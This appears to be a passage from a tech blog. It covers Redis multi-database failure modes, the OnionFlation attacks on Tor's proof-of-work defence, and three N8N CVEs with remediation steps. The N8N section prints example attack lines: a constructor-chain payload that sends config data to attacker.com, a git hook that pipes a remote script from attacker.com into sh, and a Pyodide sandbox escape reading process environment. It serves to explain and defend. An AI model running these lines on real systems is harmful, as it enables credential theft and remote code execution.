result = cache.get("api:products:page:1")  # returns None — evicted
# Cache miss. Your DB gets hammered.

When Redis hits the memory limit it runs LRU eviction across all keys in all databases. It doesn’t know or care that database 10’s cache keys are serving live user traffic. It just evicts whatever is least recently used. Your carefully populated cache gets gutted to make room for the pipeline. Cache hit rate goes from 85% to 12%. Your database gets hammered. Everyone’s pager goes off at 2am.

This is not a hypothetical. It’s a well-documented operational failure mode.
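A ten-line simulation makes the mechanics concrete. This is a toy LRU over a shared capacity, not redis-py (and reads don't refresh recency here, which real LRU would): two "databases" share one memory budget, and a flood in one evicts the other's keys.

```python
from collections import OrderedDict

class SharedLRU:
    """Toy model of one Redis instance: all databases share one capacity."""
    def __init__(self, capacity):
        self.capacity, self.store = capacity, OrderedDict()

    def set(self, db, key, value):
        self.store[(db, key)] = value
        self.store.move_to_end((db, key))
        while len(self.store) > self.capacity:
            # Evict least-recently-used, regardless of which db it lives in
            self.store.popitem(last=False)

    def get(self, db, key):
        return self.store.get((db, key))

r = SharedLRU(capacity=100)
r.set(10, "api:products:page:1", "cached response")  # db 10: live cache entry
for i in range(200):                                  # db 5: pipeline burst
    r.set(5, f"job:{i}", "big payload")

assert r.get(10, "api:products:page:1") is None       # cache entry evicted
```

The eviction policy never consulted the database number. That is the whole story of Case 1 in miniature.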

Case 2: FLUSHDB Takes Down More Than You Planned

You’re cleaning up stale test data. You connect to what you think is the test database — but the client defaults to database 0 — and run FLUSHDB. Redis flushes database 0. Your sessions live in database 0. Your production users are now all logged out simultaneously.

# Developer runs this thinking they're on the test DB
redis-cli -n 0 FLUSHDB

# But your sessions were also on DB 0
# Every logged-in user just got kicked out
# Support tickets: many

With separate instances, this failure mode is impossible. You’d have to explicitly connect to the production instance and deliberately flush it. The separate instance is an actual boundary. The database number is just a label.

Case 3: FLUSHALL Is Always a Disaster

Someone runs FLUSHALL to clean up a database. FLUSHALL wipes every database in the instance. It doesn’t ask which one. If all your databases are in one Redis instance, this single command takes out everything: your sessions, your pipeline queues, your caches, your temporary data. Everything. Simultaneously.

# Looks like it's cleaning just one thing
redis-cli FLUSHALL  # deletes EVERY database (0 through 15)

# Equivalent damage: one wrong command vaporises
# db 0: sessions     → all users logged out
# db 5: pipeline     → all queued jobs lost
# db 10: cache       → cache cold, DB under full load
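Independent of the instance-separation argument, a belt-and-braces mitigation is to disable the destructive commands outright. In classic redis.conf this is `rename-command` (renaming to an empty string disables the command entirely; note that Redis 6+ offers ACLs as the preferred mechanism for this, so check your version's docs):

```
# redis.conf — neuter the footguns
rename-command FLUSHALL ""
rename-command FLUSHDB  ""
```

This does not fix the shared-resource problem, but it turns "one wrong command vaporises everything" into "command not found".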

Case 4: A Slow Operation Blocks Everything

Redis is single-threaded for command execution. A slow operation in one database blocks commands in all other databases. You’re running a large KEYS * scan in database 5 during maintenance (yes, you know not to do this, but someone does it anyway). It takes 800ms. For 800ms, every GET in database 10 queues up. Your cache layer is unresponsive. Your application timeout counters tick.

# Someone runs this on db 5 "just to debug something"
redis-cli -n 5 KEYS "*pipeline*"
# Returns after 800ms

# During those 800ms, database 10 clients are blocked:
cache.get("user:session:abc123")  # waiting... waiting...
# Your app's 500ms timeout fires
# HTTP 504 responses hit your users

With separate instances, a blocked db 5 instance doesn’t touch db 10’s instance. The processes are independent.
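The queueing arithmetic is worth seeing once. This is a minimal single-queue model of Redis's command loop, not redis-py: one 800ms scan enqueued ahead of fast GETs makes every GET behind it inherit the scan's latency. (The real fix for the KEYS call itself is cursor-based SCAN, which yields between batches.)

```python
def waits(durations_ms):
    """Wait time each command spends queued behind earlier commands."""
    done, out = 0, []
    for d in durations_ms:
        out.append(done)   # time this command waited before executing
        done += d
    return out

queue = [800] + [1] * 5    # a KEYS scan, then five 1ms GETs

# Every GET behind the scan waited at least 800ms — past a 500ms timeout
assert all(w >= 800 for w in waits(queue)[1:])
```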

Dark diagram showing how Redis single-threaded commands and shared memory cause cross-database interference
One process, one thread, one memory pool: a bad day in database 5 is a bad day everywhere

The Redis Cluster Problem: A Hard Wall

Here’s a constraint that isn’t optional or configurable. Redis Cluster, which is the standard approach for horizontal scaling and high availability in production, only supports database 0.

“Redis Cluster supports a single database, and the SELECT command is not allowed.” — Redis Cluster specification

If you’ve built your application around multiple database numbers and you later need to scale horizontally with Redis Cluster, you’re stuck. You have to refactor your data access layer, migrate your keys, and retest everything. The cost of the “convenient” multi-database approach arrives as a large refactoring bill exactly when you can least afford it: when your traffic is growing.

The Proper Pattern: Separate Instances

The correct approach is to run a separate Redis instance for each logical use case. This is not complicated. Redis has a tiny footprint. Running three instances adds almost no overhead compared to running one instance with three databases.

# redis-pipeline.conf
port 6380
maxmemory 1gb
maxmemory-policy noeviction  # pipeline jobs must NOT be evicted
save 900 1                   # persist pipeline jobs to disk

# redis-cache.conf
port 6381
maxmemory 2gb
maxmemory-policy allkeys-lru  # cache should evict LRU freely
save ""                       # no persistence needed for cache

# redis-sessions.conf
port 6382
maxmemory 512mb
maxmemory-policy volatile-lru  # only evict keys with TTL set
save 60 1000                   # persist sessions more aggressively

Notice what this gives you that you absolutely cannot have with multiple databases. Each instance has its own maxmemory and its own maxmemory-policy. Your pipeline instance uses noeviction because job loss is unacceptable. Your cache instance uses allkeys-lru because cache misses are fine. Your session instance uses volatile-lru and persists aggressively. These policies are mutually exclusive requirements. You cannot satisfy them with a single configuration file.

# Application connections — clean and explicit
import redis

pipeline_redis = redis.Redis(host='localhost', port=6380)
cache_redis    = redis.Redis(host='localhost', port=6381)
session_redis  = redis.Redis(host='localhost', port=6382)

# Now a pipeline burst doesn't evict cache entries
# A FLUSHDB on cache doesn't touch sessions
# A slow pipeline scan doesn't block session lookups
# Each can scale, replicate, and fail independently

The Pragmatic Programmer’s core principle of orthogonality applies perfectly here: components that have nothing to do with each other should not share internal state. Your pipeline and your cache are orthogonal concerns. Coupling them through a shared Redis process violates that principle, and you pay for the violation eventually.

Dark architectural diagram showing three independent Redis instances with separate resources, configurations and isolation
Separate instances: different ports, different configs, different memory policies, zero cross-contamination

How to Migrate Away From Multiple Databases

If you’re already using multiple databases in production, the migration is straightforward but requires care. Here’s the logical path.

Step 1: Inventory your databases. Connect to your Redis instance and check what’s actually living in each database.

# Check key counts per database
redis-cli INFO keyspace
# Output shows something like:
# db0:keys=1240,expires=1100,avg_ttl=86300000
# db5:keys=340,expires=340,avg_ttl=3598000
# db10:keys=5820,expires=5820,avg_ttl=299000

Step 2: Start new instances before touching the old one. Spin up your new Redis instances with appropriate configs for each use case. Don’t migrate anything yet.

Step 3: Dual-write during transition. Update your application to write to both the old database number and the new dedicated instance. Reads still come from the old instance. This gives you a warm new instance without a cold-start cache miss storm.

# Transition period: write to both, read from old
def set_cache(key, value, ttl):
    old_redis.select(10)
    old_redis.setex(key, ttl, value)
    new_cache_redis.setex(key, ttl, value)  # warm the new instance

def get_cache(key):
    return old_redis.get(key)  # still reading from old

Step 4: Flip reads, then remove dual-write. Once the new instance has a reasonable warm state, flip reads to the new instance. Monitor cache hit rates. Once stable for a day or two, remove the dual-write to the old database number.
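The read flip in Step 4 is safer with a short fallback window. A sketch with dict-backed stand-ins for the two clients (real code would use the redis.Redis handles from earlier; `old_db10` and `new_cache` are illustrative names):

```python
old_db10 = {"api:products:page:1": "stale-but-present"}  # old shared instance
new_cache = {}                                            # dedicated cache instance

def get_cache(key):
    # Read from the new instance first; fall back to the old database
    # number only while the new instance is still warming up.
    value = new_cache.get(key)
    if value is None:
        value = old_db10.get(key)
    return value

assert get_cache("api:products:page:1") == "stale-but-present"  # fallback hit
new_cache["api:products:page:1"] = "fresh"
assert get_cache("api:products:page:1") == "fresh"              # new instance wins
```

Once fallback hits drop to zero in your metrics, remove the fallback and the dual-write together.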

Step 5: Verify and clean up. After all traffic is on dedicated instances, verify the old database numbers are empty and decommission them.

Dark flowchart showing step by step migration from multi-database Redis to separate instances
The migration path: inventory, spin up, dual-write, flip, clean up

When Multiple Databases Are Actually Fine

It would be unfair to say multiple databases are always wrong. There are genuine use cases:

  • Local development and unit tests — when you want to isolate test data from dev data on a single machine without the overhead of multiple processes. Database 0 for your running dev server, database 1 for tests that get flushed between runs.
  • Organisational separation within a single application — separating sessions, cache, and queues within one application that has identical resource requirements and tolerates the same eviction policy. This is the original intended use case.
  • Very small applications with negligible traffic — where the Redis instance is nowhere near its limits and you simply want namespace separation without the operational overhead.

The moment you have meaningfully different workloads, different eviction requirements, or need horizontal scaling, multiple databases stop being an organisational convenience and start being a liability.

What to Check Right Now

  • Run INFO keyspace — if you see more than db0 in production with significant key counts, you have work to do.
  • Check your maxmemory-policy — one policy cannot serve all use cases correctly. If you have both pipeline jobs and cache data, you need different policies.
  • Check for Redis Cluster in your roadmap — if it’s there, multiple databases will block you. Start planning the migration now, before you need to scale.
  • Audit your FLUSHDB and FLUSHALL usage — in scripts, Makefiles, CI pipelines, anywhere. Know exactly what would be affected if one of those runs in the wrong context.
  • Review slow query logs — check if slow commands in one database are causing latency spikes visible in your application metrics at the same timestamps.
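The first checklist item is easy to script. A small parser for INFO keyspace output — fed here with the sample from the migration section; in production you would pipe in the output of `redis-cli INFO keyspace`:

```python
def parse_keyspace(info_text):
    """Parse 'dbN:keys=...,expires=...' lines into {db_number: key_count}."""
    out = {}
    for line in info_text.splitlines():
        if line.startswith("db"):
            db, fields = line.split(":", 1)
            out[int(db[2:])] = int(fields.split(",")[0].split("=")[1])
    return out

sample = """db0:keys=1240,expires=1100,avg_ttl=86300000
db5:keys=340,expires=340,avg_ttl=3598000
db10:keys=5820,expires=5820,avg_ttl=299000"""

counts = parse_keyspace(sample)
assert counts == {0: 1240, 5: 340, 10: 5820}
if len(counts) > 1:
    print(f"multiple databases in use: {sorted(counts)} — plan a migration")
```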

Redis is an extraordinary tool. It earns its place in almost every production stack. But its database feature was designed for a simpler era when “run one Redis for everything” was the standard advice. The standard has moved on. Your architecture should too.

nJoy 😉

OnionFlation: How Attackers Weaponise Tor’s Only DoS Defence Against Itself

Tor’s proof-of-work puzzle system was designed as the one reliable defence against denial-of-service attacks on onion services. It was clever, it worked, and then a group of security researchers spent the better part of a year figuring out how to turn it into a weapon. The resulting family of attacks, dubbed OnionFlation, can take down any onion service for roughly $1.20 upfront and 10 cents an hour to maintain. The Tor project has acknowledged the issue. It is not yet patched.

OnionFlation Tor attack diagram
OnionFlation: weaponising Tor’s proof-of-work defence against the users it was built to protect.

Why Onion Services Have Always Been a DoS Magnet

Before understanding OnionFlation, you need to understand the original problem it was supposed to solve. Onion services have always been disproportionately easy to knock offline, and the reason is architectural. On the clearnet, denial-of-service defences rely on one thing above all else: knowing who is attacking you. Rate limiting, IP scrubbing, CAPTCHA walls, traffic shaping — all of these require visibility into the source of traffic. An onion service has none of that. The server never sees the client’s IP address; that is the entire point. So every standard DoS mitigation becomes inapplicable in one stroke.

The asymmetry goes further. When a malicious client wants to flood an onion service, it sends high-volume requests to the service’s introduction point over a single Tor circuit. But the server, upon receiving each request, must open a brand new Tor circuit to a different rendezvous point for every single one. Establishing a Tor circuit is computationally expensive: there is a full cryptographic key exchange at each hop. So the attacker pays once per circuit while the server pays once per request. This is the asymmetry that makes regular DoS against onion services so effective, and it has nothing to do with OnionFlation. It is just the baseline condition.

In 2023, these attacks reached a sustained peak. The Tor Project issued an official statement acknowledging the Tor network had been under heavy attack for seven months, and brought in additional team members specifically to design a structural fix.

How Onion Service Routing Actually Works

A quick detour is worth it here because the routing model is central to everything that follows. When you connect to a clearnet site over Tor, your traffic passes through three relays: a guard node, a middle node, and an exit node. The exit node then connects directly to the destination server, which sits outside Tor. The server’s IP address is public and the final hop is unencrypted (unless using HTTPS, but that is standard TLS at that point, nothing to do with Tor).

Onion services work differently. The server moves inside the Tor network. Before any clients connect, the server picks three ordinary Tor relays to act as introduction points and opens full three-hop Tor circuits to each of them. It then publishes a descriptor — containing its introduction points and its public key — into a distributed hash table spread across Tor’s network of directory servers. This is how clients discover how to reach the service.

When a client connects, the process looks like this:

# Simplified connection flow for an onion service

1. Client queries the distributed hash table for the onion URL
   → receives the list of introduction points

2. Client forms a 3-hop circuit to one introduction point

3. Client randomly selects a rendezvous point (any Tor relay)
   → forms a separate 2-hop circuit to it
   → sends the rendezvous point a secret "cookie" (a random token)

4. Client sends a message to the introduction point containing:
   - the rendezvous point's location
   - the cookie
   - all encrypted with the server's public key

5. Introduction point forwards the message to the server

6. Server forms a 3-hop circuit to the rendezvous point
   → presents the matching cookie

7. Rendezvous point stitches the two circuits together
   → client and server complete a cryptographic handshake
   → bidirectional encrypted communication begins

The end result is six hops total between client and server, with neither party knowing the other’s IP address. The rendezvous point is just blindly relaying encrypted traffic it cannot read. The price for this mutual anonymity is latency and, critically, the server-side cost of forming new Tor circuits on demand.

Tor onion service circuit diagram
Six hops, two stitched circuits, zero IP exposure. The elegance that also creates the attack surface.

Tor’s Answer: Proof-of-Work Puzzles (2023)

In August 2023, after months of sustained DoS attacks against the Tor network, the Tor Project deployed a new defence: proof-of-work puzzles — specified in full in Proposal 327 and documented at the onion services security reference. The mechanism is conceptually simple. Before the server forms a rendezvous circuit, the client must first solve a cryptographic puzzle. The server adjusts the puzzle difficulty dynamically based on observed load, broadcasting the current difficulty level globally via the same distributed hash table used for descriptors.

Critically, the difficulty is global, not per-client. There is a reason for this: giving per-client feedback would require forming a circuit to that client first, which is exactly the expensive operation the scheme is trying to avoid. So the puzzle difficulty is a single number that all prospective clients must solve before the server will engage with them.

For a legitimate user making a single connection, a few extra seconds is a minor inconvenience. For an attacker trying to flood the server with hundreds of requests per second, the puzzle cost scales linearly and quickly becomes infeasible. The approach brilliantly flips the asymmetry: instead of the server bearing the circuit-formation cost, the attacker now bears a cryptographic puzzle cost for every single request it wants to send. According to the paper, under active attack conditions without PoW, 95% of clients could not connect at all. With PoW active, connection times under the same attack were nearly indistinguishable from a non-attacked baseline. It was, by any measure, a success.
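Tor's actual puzzle is the EquiX scheme specified in Proposal 327, but a generic hashcash-style sketch shows the economics: solve cost grows roughly as 2^bits with difficulty, while verification stays a single hash. This is purely illustrative and shares no code with Tor.

```python
import hashlib

def _hash(challenge: bytes, nonce: int) -> int:
    return int.from_bytes(
        hashlib.sha256(challenge + nonce.to_bytes(8, "big")).digest(), "big")

def solve(challenge: bytes, difficulty_bits: int) -> int:
    # Brute-force a nonce whose hash has `difficulty_bits` leading zero bits.
    target = 1 << (256 - difficulty_bits)
    nonce = 0
    while _hash(challenge, nonce) >= target:
        nonce += 1
    return nonce                      # expected ~2**difficulty_bits attempts

def verify(challenge: bytes, nonce: int, difficulty_bits: int) -> bool:
    return _hash(challenge, nonce) < (1 << (256 - difficulty_bits))

n = solve(b"rendezvous-request", 8)   # cheap for one request...
assert verify(b"rendezvous-request", n, 8)
# ...but an attacker sending 1,000 requests pays the solve cost 1,000 times
```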

OnionFlation: Weaponising the Defence

The paper Onions Got Puzzled, presented at USENIX Security 2025, identified a fundamental flaw in how the puzzle difficulty update algorithm works. Rather than trying to overpower the puzzle system, the attacks trick the server into raising its own puzzle difficulty to the maximum value (10,000) without actually putting it under meaningful load. Once the difficulty is at maximum, even high-end hardware struggles to solve a single puzzle within Tor Browser’s 90-second connection timeout.

The researchers developed four distinct attack strategies.

Strategy 1: EnRush

The server evaluates its congestion state once every five minutes, then broadcasts a difficulty update. It cannot do this more frequently because each update requires writing to the distributed hash table across Tor’s global relay network; frequent writes would overwhelm it.

The server’s congestion check looks at the state of its request queue at the end of the five-minute window. It checks not just how many requests are queued but their difficulty levels. A single high-difficulty unprocessed request is enough to trigger a large difficulty increase, because the server reasons: “if clients are solving hard puzzles and still can’t get through, congestion must be severe.”

The EnRush attacker simply sends a small burst of high-difficulty solved requests in the final seconds of the measurement window. For the vast majority of the five-minute interval the queue was empty, but the server only checks once. It sees high-difficulty requests sitting unprocessed, panics, and inflates the difficulty to the maximum. Cost: $1.20 per inflation event.

Strategy 2: Temporary Turmoil

Instead of sending a few hard requests, the attacker floods the server with a massive volume of cheap, low-difficulty requests. This exploits a flaw in the difficulty update formula:

next_difficulty = total_difficulty_of_all_arrived_requests
                  ÷
                  number_of_requests_actually_processed

The server’s request queue has a maximum capacity. When it fills up, the server discards half the queue to make room. When this happens, the numerator (all arrived requests, including discarded ones) becomes very large, while the denominator (only successfully processed requests) remains low. The formula outputs an absurdly high difficulty. Cost: $2.80.
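The formula's failure mode is easy to reproduce numerically. This is toy arithmetic mirroring the description above, not Tor's source: discarded requests still count in the numerator, so a flood of cheap requests inflates the output far beyond what was actually served.

```python
def next_difficulty(arrived_difficulties, processed):
    """The flawed update: total arrived difficulty / requests processed."""
    return sum(arrived_difficulties) / max(processed, 1)

# Steady state: two difficulty-1 requests arrive, both get processed.
assert next_difficulty([1, 1], processed=2) == 1.0

# Temporary Turmoil: 50,000 cheap difficulty-1 requests flood the queue;
# half the queue is discarded and only 200 are actually processed.
assert next_difficulty([1] * 50_000, processed=200) == 250.0
```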

Strategy 3: Choking

Once the difficulty is inflated to the maximum via EnRush or Temporary Turmoil, the server limits itself to 16 concurrent rendezvous circuit connections. The attacker sends 16 high-difficulty requests but deliberately leaves all 16 connections half-open by refusing to complete the rendezvous handshake. The server’s connection slots are now occupied by dead-end circuits. No new legitimate connections can be accepted even from users who successfully solved the maximum-difficulty puzzle. Cost: approximately $2 per hour to maintain.

Strategy 4: Maintenance

After inflating the difficulty, the attacker needs to stop the server from lowering it again. The server decreases difficulty when it sees an empty queue at the measurement window. The maintenance strategy sends a small trickle of zero-difficulty requests, just enough to keep the queue non-empty. The current implementation counts requests regardless of their difficulty level, so even trivially cheap requests prevent the difficulty from dropping. Cost: 10 cents per hour.

OnionFlation four attack strategies diagram
EnRush and Temporary Turmoil inflate the difficulty; Choking and Maintenance hold it there.

The Theorem That Makes This Hard to Fix

The researchers did not just develop attacks. They also proved, mathematically, why this class of problem is fundamentally difficult to solve. This is where the paper becomes genuinely interesting beyond the exploit mechanics.

They demonstrate a perfect negative correlation between two properties any difficulty update algorithm could have:

  • Congestion resistance: the ability to detect and respond to a real DoS flood, raising difficulty fast enough to throttle the attacker.
  • Inflation resistance: the ability to resist being tricked into raising difficulty when there is no real load.

Theorem 1: No difficulty update algorithm can be simultaneously resistant to both congestion attacks and inflation attacks.

Maximising one property necessarily minimises the other. Tor’s current implementation sits at the congestion-resistant end of the spectrum, which is why OnionFlation attacks are cheap. Moving toward inflation resistance makes the system more vulnerable to genuine flooding attacks, which is what the PoW system was built to stop in the first place. As Martin notes in Clean Code, a system designed to solve one problem perfectly often creates the conditions for a new class of problem — the same logical structure applies here to protocol design.

The researchers tried five different algorithm tweaks. All of them failed to stop OnionFlation at acceptable cost. The best result pushed the attacker’s cost from $1.20 to $25 upfront and $0.50 an hour, which is still trivially affordable.

The Proposed Fix: Algorithm 2

After exhausting incremental tweaks, the researchers designed a new algorithm from scratch. Instead of taking a single snapshot of the request queue every five minutes, Algorithm 2 monitors the server’s dequeue rate: how fast it is actually processing requests in real time. This makes the difficulty tracking continuous rather than periodic, removing the window that EnRush exploits.

The algorithm exposes a parameter called delta that lets onion service operators tune their own trade-off between inflation resistance and congestion resistance. The results are considerably better:

# With Algorithm 2 (default delta):
# EnRush cost to reach max difficulty: $383/hour (vs $1.20 one-time previously)

# With delta increased slightly by the operator:
# EnRush cost: $459/hour

# Choking becomes moot because EnRush and Temporary Turmoil
# can no longer inflate the difficulty in the first place.

This is a 300x increase in attacker cost under the default configuration. The researchers tested it against the same attacker setup they used to validate the original OnionFlation attacks and found that Algorithm 2 completely prevented difficulty inflation via EnRush and Temporary Turmoil.

That said, the authors are careful to note this is one promising approach, not a proven optimal solution. The proof that no algorithm can fully resolve the trade-off still stands; Algorithm 2 just moves the dial considerably further toward inflation resistance while keeping congestion resistance viable.

Where Things Stand: Prop 362

The researchers responsibly disclosed their findings to the Tor Project in August 2024. The Tor Project acknowledged the issue and shortly afterwards opened Proposal 362, a redesign of the proof-of-work control loop that addresses the exact structural issues identified in the paper. As of the time of writing, Prop 362 is still marked open. The fix is not yet deployed.

The delay reflects the structural difficulty: any change to the global difficulty broadcast mechanism touches the entire Tor relay network, not just onion service code. Testing and rolling out changes at that scale without disrupting the live network is a non-trivial engineering problem, entirely separate from the cryptographic and algorithmic design questions.

What Onion Service Operators Can Do Right Now

The honest answer is: not much, beyond sensible hygiene. The vulnerability is in the PoW difficulty update mechanism, which operators cannot replace themselves. But the following steps reduce your exposure.

Keep Tor updated

When Prop 362 ships, update immediately. Track Tor releases at blog.torproject.org. The fix will be a daemon update.

# Debian/Ubuntu — keep Tor from the official Tor Project repo
apt-get update && apt-get upgrade tor

Do not disable PoW

Disabling proof-of-work entirely (HiddenServicePoWDefensesEnabled 0) removes the only available DoS mitigation and leaves you exposed to straightforward circuit-exhaustion flooding. OnionFlation is bad; unprotected flooding is worse. Leave it on.

Monitor difficulty in real time

If you have Tor’s metrics port enabled, you can track the live puzzle difficulty and get early warning of an inflation attack in progress:

# Watch the suggested effort metric live
watch -n 5 'curl -s http://127.0.0.1:9052/metrics | grep suggested_effort'

# Or pipe directly from the metrics port if configured
# tor config: MetricsPort 127.0.0.1:9052

A sudden jump to 10,000 with no corresponding load spike in your service logs is a strong indicator of an OnionFlation attack rather than a legitimate traffic event.

Keep your service lightweight

Algorithm 2 improves cost for the attacker considerably but does not eliminate inflation attacks entirely. Running a resource-efficient service (minimal memory footprint, fast request handling) means your server survives periods of elevated difficulty with less degradation for users who do manage to solve puzzles and connect.

Redundant introduction points

Tor allows specifying the number of introduction points (default 3, maximum as set in your Tor configuration). More introduction points spread the attack surface somewhat, though this is a marginal benefit since the OnionFlation attack operates via the puzzle difficulty mechanism, not by targeting specific introduction points.

# torrc: set higher introduction point count
# (consult your Tor version docs for exact directive)
HiddenServiceNumIntroductionPoints 5

Onion service hardening diagram
Hardening steps for onion service operators while waiting for Prop 362 to ship.

Sources and Further Reading

Video Attribution

Credit to Daniel Boctor for the original live demonstration of this attack, including compiling Tor from source to manually set the puzzle difficulty to 10,000 and showcasing the real-time impact on connection attempts. The full walkthrough is worth watching:


nJoy 😉

Three 9.9-Severity Holes in N8N: What They Are and How to Fix Them

If your workflow automation platform has access to your API keys, your cloud credentials, your email, and every sensitive document in your stack, it had better be airtight. N8N, one of the most popular self-hosted AI workflow tools around, just disclosed three vulnerabilities all rated 9.9 or higher on the CVSS scale. That is not a typo. Three separate critical flaws in the same release cycle. Let us walk through what is actually happening under the hood, why these bugs exist, and what you need to do to fix them.

N8N critical vulnerabilities diagram
Three 9.9-severity CVEs in N8N — a case study in why sandboxing arbitrary execution is brutally hard.

What is N8N and Why Does Any of This Matter?

N8N is a workflow automation platform in the spirit of Zapier or Make, but self-hosted and AI-native. You wire together “nodes” — small units that do things like pull from an API, run a script, clone a git repository, or execute Python — into pipelines that automate essentially anything. That last sentence is where the problem lives. When your platform’s entire value proposition is “run arbitrary code against arbitrary APIs”, the attack surface is not small.

The threat model here is not some nation-state attacker with a zero-day budget. It is this: you are running N8N at work, or in your home lab, and several people have accounts at different trust levels. One of those users turns out to be malicious, or simply careless enough to import a workflow from the internet without reading it. The three CVEs below are all authenticated attacks, meaning the attacker already has a login. But once they are in, they can compromise the entire instance and read every credential stored by every other user on the node. If you have ever wondered why the principle of least privilege exists, here is a textbook example.

CVE-2025-68613: JavaScript Template Injection via constructor.constructor

This one is elegant in the most uncomfortable sense. N8N workflows support expression nodes, small blobs of JavaScript that get evaluated to transform data as it flows through the pipeline. The bug is in how these expressions are sanitised before evaluation: they are not, at least not sufficiently.

An authenticated attacker creates a workflow with a malicious “Function” node and injects the following pattern into an expression parameter:

{{ $jmespath($input.all(), "[*].{payload: payload.expression}")[0].payload }}

The payload itself is something like this:

// Inside the malicious workflow's function node
const fn = (function(){}).constructor.constructor('return require("child_process")')();
fn.execSync('curl http://attacker.com/exfil?data=$(cat /data/config.json)', { encoding: 'utf8' });

If you recognise that constructor.constructor pattern, you have probably read about the React Server Components flight protocol RCE from 2024. The idea is the same: if you do not lock down access to the prototype chain, you can climb your way up to the Function constructor and use it to build a new function from an arbitrary string. From there, require('child_process') is just a function call away, and execSync lets you run anything with the same privileges as the N8N process.

The reason this class of bug keeps appearing is that JavaScript’s object model is a graph, not a tree. As Hofstadter might put it in Gödel, Escher, Bach, the system is self-referential by design: functions are objects, objects have constructors, constructors are functions. Trying to sandbox that without a proper allow-list is fighting the language itself.

Constructor chain injection diagram
Climbing the constructor chain: from user expression to arbitrary OS command execution.

CVE-2025-68668: Python Sandbox Bypass (“N8tescape”)

N8N supports a Python code node powered by Pyodide, a runtime that compiles CPython to WebAssembly so it can run inside a JavaScript environment. The idea is that by running Python inside WASM, you get a layer of isolation from the host. In theory, reasonable. In practice, the sandbox was implemented as a blacklist.

A blacklist sandbox is the security equivalent of putting up a sign that says “No bicycles, rollerblades, skateboards, or scooters.” The next person to arrive on a unicycle is perfectly within the rules. The correct approach is a whitelist: enumerate exactly what the sandboxed code is allowed to do and deny everything else by default.
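To see what deny-by-default looks like in miniature, here is a static allow-list check over a snippet's imports using Python's ast module. To be clear, this is nowhere near a real sandbox — getattr tricks, `__import__`, and exec all walk straight past a static check — but it illustrates the allow-list posture: enumerate what is permitted, reject everything else.

```python
import ast

ALLOWED = {"math", "json"}   # deny by default: everything else is rejected

def check(source: str) -> bool:
    """Return True only if every import resolves to an allowed top-level module."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            if any(a.name.split(".")[0] not in ALLOWED for a in node.names):
                return False
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] not in ALLOWED:
                return False
    return True

assert check("import math\nprint(math.pi)")
assert not check("import subprocess")   # the unicycle is rejected too
```

The blacklist version of this function would enumerate `subprocess`, `os`, `socket`… and lose the moment anyone thinks of a module it forgot.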

In the case of N8N’s Python node, the blacklist missed subprocess.check_output, which is one of the most obvious ways to shell out from Python:

import subprocess
result = subprocess.check_output(['id'], shell=False)
print(result)  # uid=1000(n8n) gid=1000(n8n) ...

That alone is bad enough. But Pyodide also exposes an internal API that compounds the issue. The runtime has a method called runPython (sometimes surfaced as pyodide.runPythonAsync or accessed via the internal _api object) that evaluates Python code completely outside the sandbox restrictions. So even if the blacklist had been more thorough, an attacker could escape through the runtime’s own back door:

// From within the N8N sandbox, access Pyodide's internal runtime
const pyodide = globalThis.pyodide || globalThis._pyodide;
pyodide._api.runPython(`
import subprocess
subprocess.check_output(['cat', '/proc/1/environ'])
`);

N8N patched the obvious subprocess bypass in version 1.11.1 by making the native Python runner opt-in via an environment variable (N8N_PYTHON_ENABLED). It is disabled by default in patched builds. The Pyodide internal API bypass was disclosed shortly after and addressed in a subsequent patch.

CVE-2026-21877: Arbitrary File Write via the Git Node

The Git node in N8N lets you build workflows that clone repositories, pull updates, and interact with git as part of an automated pipeline. The vulnerability here is an arbitrary file write: an authenticated attacker can craft a workflow that causes a repository to be cloned to an attacker-controlled path on the host filesystem, outside the intended working directory.

The most likely mechanism, based on Rapid7’s write-up, is either a directory traversal in the destination path parameter, or a git hook execution issue. When you clone a repository, git can execute scripts automatically via hooks (.git/hooks/post-checkout, for example). If the N8N process clones an attacker-controlled repository without sanitising hook execution, those scripts run with the privileges of N8N:

# .git/hooks/post-checkout (inside attacker's repo)
#!/bin/sh
curl http://attacker.com/shell.sh | sh

Alternatively, a traversal in the clone target path lets the attacker overwrite arbitrary files in the N8N process’s reach, including config files, plugin scripts, or anything that gets loaded dynamically at runtime. Either way, the result is remote code execution under the N8N service account.

Git node file write vulnerability diagram
Git hooks or directory traversal in the clone target: two paths to the same outcome.

How to Fix It

Here is what you need to do, in order of priority.

1. Update N8N immediately

All three CVEs are patched. The minimum safe version is 1.11.1 for the Python sandbox fix; check the N8N releases page for the latest. If you are running Docker:

# Pull the latest patched image
docker pull n8nio/n8n:latest

# Or pin to a specific patched version
docker pull n8nio/n8n:1.11.1

# Restart your container
docker compose down && docker compose up -d

2. Disable the native Python runner if you do not need it

In patched builds the native Python execution environment is off by default. Keep it that way unless you explicitly need it. If you do need Python in N8N, enable it explicitly in your environment, keep it confined to a managed, isolated runner, and accept the residual risk:

# In your docker-compose.yml or .env
N8N_RUNNERS_ENABLED=true
N8N_RUNNER_PYTHON_ENABLED=false  # leave false unless you need it

3. Never expose N8N to the public internet

All three of these are authenticated attacks, but that does not mean “exposure is fine”. Default credentials, credential stuffing, and phishing are real vectors. Put N8N behind a VPN or a private network interface. If you are on a VPS, a simple firewall rule is the minimum:

# UFW: allow N8N only from your own IP or VPN range.
# Order matters: UFW matches rules in the order they were added,
# so add the specific allow rule before the blanket deny.
ufw allow from 10.8.0.0/24 to any port 5678  # VPN subnet example
ufw deny 5678

4. Run N8N as a non-privileged user with a restricted filesystem

N8N should not run as root. If it does, any RCE immediately becomes a full server compromise. In Docker, set a non-root user and mount only the volumes N8N actually needs:

services:
  n8n:
    image: n8nio/n8n:latest
    user: "1000:1000"
    volumes:
      - n8n_data:/home/node/.n8n  # only the data volume, nothing else
    environment:
      - N8N_RUNNERS_ENABLED=true

5. Enforce strict workflow permissions

In N8N’s settings, limit which users can create or modify workflows. The principle of least privilege applies here just as it does anywhere else in your infrastructure. A user who only needs to trigger existing workflows has no business being able to create a Function node.

# Workflow creation rights themselves are managed through N8N's user roles.
# On top of that, restrict what workflow code can touch on the filesystem:
N8N_RESTRICT_FILE_ACCESS_TO=/home/node/allowed   # list of permitted paths (example)
N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true

6. Audit stored credentials

If your N8N instance was exposed and you suspect compromise, rotate every credential stored in it. API keys, OAuth tokens, database passwords, all of it. N8N stores credentials encrypted at rest, but if the process was compromised, the encryption keys were in memory and accessible. Treat all stored secrets as leaked.

Security hardening checklist diagram
